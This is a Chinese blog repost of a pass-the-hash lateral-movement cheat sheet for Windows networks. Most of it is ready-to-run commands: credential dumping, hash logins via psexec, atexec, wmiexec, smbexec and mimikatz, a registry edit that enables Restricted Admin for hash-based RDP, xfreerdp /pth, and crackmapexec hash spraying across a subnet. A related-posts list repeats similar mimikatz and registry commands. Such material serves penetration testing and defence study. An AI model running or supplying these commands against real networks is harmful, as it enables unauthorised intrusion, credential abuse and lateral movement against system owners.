内网PTH攻击

最新推荐文章于 2023-08-07 08:56:07 发布
最新推荐文章于 2023-08-07 08:56:07 发布
阅读量274 收藏 1
点赞数
文章标签: 安全
原文链接:https://xz.aliyun.com/t/12550
版权

1.获取密码
在cs下面
loginpasswords
获取密码哈希: c6de864a0d3ba9437e6a1e0789d4a844
2.psexec 哈希登录
psexec -hashes :c6de864a0d3ba9437e6a1e0789d4a844 ./administrator@192.168.100.129
3.Atexec哈希登录
利用139和445端口,它会创建计划任务-执行计划任务-删除计划任务
Atexec -hashes :c6de864a0d3ba9437e6a1e0789d4a844 ./administrator@192.168.100.129 “whoami”
4.Wmiexec哈希登录
利用135端口
wmiexec.exe -hashes :c6de864a0d3ba9437e6a1e0789d4a844 ./administrator@192.168.100.129 “whoami”
5.Smbexec哈希登录
和psexec类似
Smbexec.exe -hashes :c6de864a0d3ba9437e6a1e0789d4a844 ./administrator@192.168.100.129
6.Mimikatz
rivilege::debug
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:c6de864a0d3ba9437e6a1e0789d4a844
7.hash 进行rdp登录
使用hash远程登录RDP,需要开启"Restricted Admin Mode"
REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f //开启Restricted Admin mode
8.利用mimikatz进行rdp登录。
sekurlsa::pth /user:administrator /domain:192.168.100.164 /ntlm:c6de864a0d3ba9437e6a1e0789d4a844 “/run:mstsc.exe /restrictedadmin”
9.利用xfreerdp进行rdp登录,kali自带该工具
xfreerdp /v:192.168.100.164 /u:administrator /pth:c6de864a0d3ba9437e6a1e0789d4a844 /cert:ignore
10.pth批量爆破
利用crackmapexec进行密码喷洒,喷洒本地administrator
crackmapexec smb 192.168.100.0/24 -u administrator -H NTLM-HASH.txt(收集到的hash字典) -x whoami -d workgroup
涉及工具:
https://github.com/maaaaz/impacket-examples-windows
原文:https://xz.aliyun.com/t/12550

我是simeon
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PTH攻击总结
systemino的博客
05-26 2550
搞过内网渗透的,你肯定听过pth攻击。这种攻击效果非常显著,微软也是因此在存储凭证方面做了很大的改变。但即使是不断的更新,发布补丁,pth攻击还是存在。今天我们就来一探究竟。 目录 ·pth攻击回顾 ·微软更新 ·hash和NTLM介绍 ·Pth攻击原理 ·Zeros取代LM hash ·实际中的配置 ·pth攻击 ·Mimikatz ·SMB pth攻击 · msf scanner/smb/smb_login · Empire lateral_moveme...
pth-toolkit:传递哈希工具集合的修改版本可以直接开箱即用
06-26
pth-工具包 传递哈希工具集合的修改版本设计为便携,即使在最“裸露的骨骼”系统上也可以直接开箱即用 master 分支是为 amd64 编译的,最终目标是将这些工具交叉编译到所有可能的架构 目前,此 repo 提供以下修补工具/实用程序: winexe 微信 管理系统 客户端 客户端 获取 网 要求 sh 所有工具都在只有base包的裸机 Arch linux 安装上进行了测试。 这什么时候有用? 当您使用自定义渗透测试操作系统并且您不想自己经历编译和修补这些工具的痛苦时 用于从受感染的 *nix 主机转向 Windows 框/域的后利用! 只需克隆这个 repo 或下载 tarball 就可以传递所有的哈希值了!
pth常用工具
whojoe的博客
01-21 838
pth常用工具实现rdpPTHCrackMapExec 实现rdp windows privilege::debug sekurlsa::pth /user:administrator /domain:remoteserver /ntlm:d25ecd13fddbb542d2e16da4f9e0333d "/run:mstsc.exe /restrictedadmin" kali xfreerdp /u:administrator /pth:d25ecd13fddbb542d2e16da4f9e0333d
PTH登陆RDP
Shanfenglan's blog
06-30 1638
修改注册表: REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin" #查询结果 利用过程 在本地计算机使用mimikatz登陆远程主机 privilege::debug se
kali下利用FreeRDP进行hash登录远程桌面
最新发布
crowsec
08-07 1525
在很多情况下,拿不到明文密码,由于对方机器是win2012的话,可以尝试使用hash登录RDP,看下桌面有什么东西。
GFPGANv1.4.pth
04-30
GFPGANv1.4.pth下载
GFPGANv1.3.pth
03-24
GFPGANv1.3.pth模型文件 官网:https://github.com/TencentARC/GFPGAN/blob/master/README.md
best.pth.tar
08-05
https://github.com/choyingw/SynergyNet best.pth.tar
PTH和NPTH有何区别
01-20
PTH是沉铜孔(Plating Through Hole),孔壁有铜,一般是过电孔(VIA)及元件孔。  NPTH是非沉铜孔(Non Plating Through Hole),孔壁无铜,一般是定位孔及锣丝孔。可用干膜封孔或在电镀前胶粒塞或电镀后二次钻孔或...
pytorch实现从本地加载 .pth 格式模型
09-17
今天小编就为大家分享一篇pytorch实现从本地加载 .pth 格式模型,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
rdp连接工具_横向渗透之 [RDP]
weixin_39928940的博客
11-27 1448
重生信息安全T3ngYu一、RDP 服务确定和启动 1. 确定RDP服务是否启动和服务端口 (1)注册表查询REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启 REG QUERY "HKEY_LOCAL_MACH...
〖教程〗Ladon SmbExec Hash传递远程执行命令
K8哥哥
09-15 545
Ladon8.8更新功能 [+]SmbExec NTLM-HASH非交互执行无回显 [u]GetInfo 新增Vmware虚拟机信息 [u]OsScan 新增识别Vigor Router路由器识别 [u]新增Xen\VBOX\Hybrid\Parallels虚拟机识别 [+]GetInfo 新增cmdkey、RrpLog、安装驱动、软件列表、最近访问文件等 [+]GetInfo 新增GUID、CPUID、硬盘ID、自启动后门检测(DLL却持、注册表等) [+]GetInfo2 新增WMI补丁信息获
内网横向之PTH
qq_44029310的博客
10-16 1899
内网横向之PTH,以前的笔记整理,方便查看翻找。本文包括PsExec、CrackMapExec和WMI。
域渗透-横向移动(PTH)
m0_58596609的博客
11-15 2377
一. Windows本地认证 基础知识 Windows内部是不保存明文密码的,只保存密码的hash。 本机用户的密码hash是放在本地的SAM文件 里面,域内用户的密码hash是存在域控的NTDS.DIT文件里面。 SAM文件位置:%SystemRoot%\system32\config\sam 当我们登录系统的时候,系统会自动地读取SAM文件中的“密码”与我们输入的“密码”进行对比,如果相同,则认证成功。 密码格式 Administrator:500:AAD3B435B51404EEAAD3B4
AD域渗透 | PTH&PTK哈希传递攻击手法
m0_57221101的博客
04-13 1127
AD域渗透的第二篇,托更一下Kerberos协议的分析文章,等到攻击手法研究明白了,再把协议分析放上来,防止像那些理解不明不白的人写的东西一样祸害人。 发生情况 在高版本的windows server下账号密码不再以明文的方式保存,转而以hash的形式储存,但是假如我们在攻击的时候抓取到了用户hash也可以直接用hash来直接通过验证,模拟用户登录 原理 由于验证原理的问题密码是在本地计算成hash,然后使用hash加密时间戳作为pre-Authention-data来上传,因此如果我们使用自己的脚
内网渗透之PTH
cxk
06-03 3145
PTH (pass-the-hash) pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。 pass the hash原理: 在Windows系统中,通常会使用NTLM身份认证 NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonU...
哈希传递(PTH攻击利用
niqiu320的博客
06-01 857
哈希传递(PTH攻击利用 环境:kali &win8 privilege::debug sekurlsa::logonpasswords win8中运行: 网上github先下载mimikatz_trunk,下载解压后在x64中打开小猕猴桃 sekurlsa::pth /user:administrator /domain:本机IP /ntlm:7365e3b22baeaebc0411873eedf84390 kali中按下方操作 msf > use exploit/wind
PtH(hash传递攻击)原理探秘
weixin_30500473的博客
08-10 3573
背景知识 Windows 横向渗透的两种方式 1、hash传递攻击,通过传递NTLM-Hash,登录机器,简称PtH; 2、ticket传递攻击,通过传递kerberos的ticket,登录机器,简称PtT; 以上两种都是常见的域内或者叫做内网渗透的横向移动的常见手段。 NTLM协议机制简述 在hash传递攻击中。传递的就是NTLMhash值,这里我们就要简述一下NTLM的过程。 NT...
pth文件
05-25
.pth文件是PyTorch中模型的保存格式,它包含了PyTorch模型的权重参数和网络结构等信息。.pth文件可以用来恢复训练好的模型,或者在其他程序中加载已经训练好的模型,进行预测或fine-tuning等操作。 在PyTorch中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值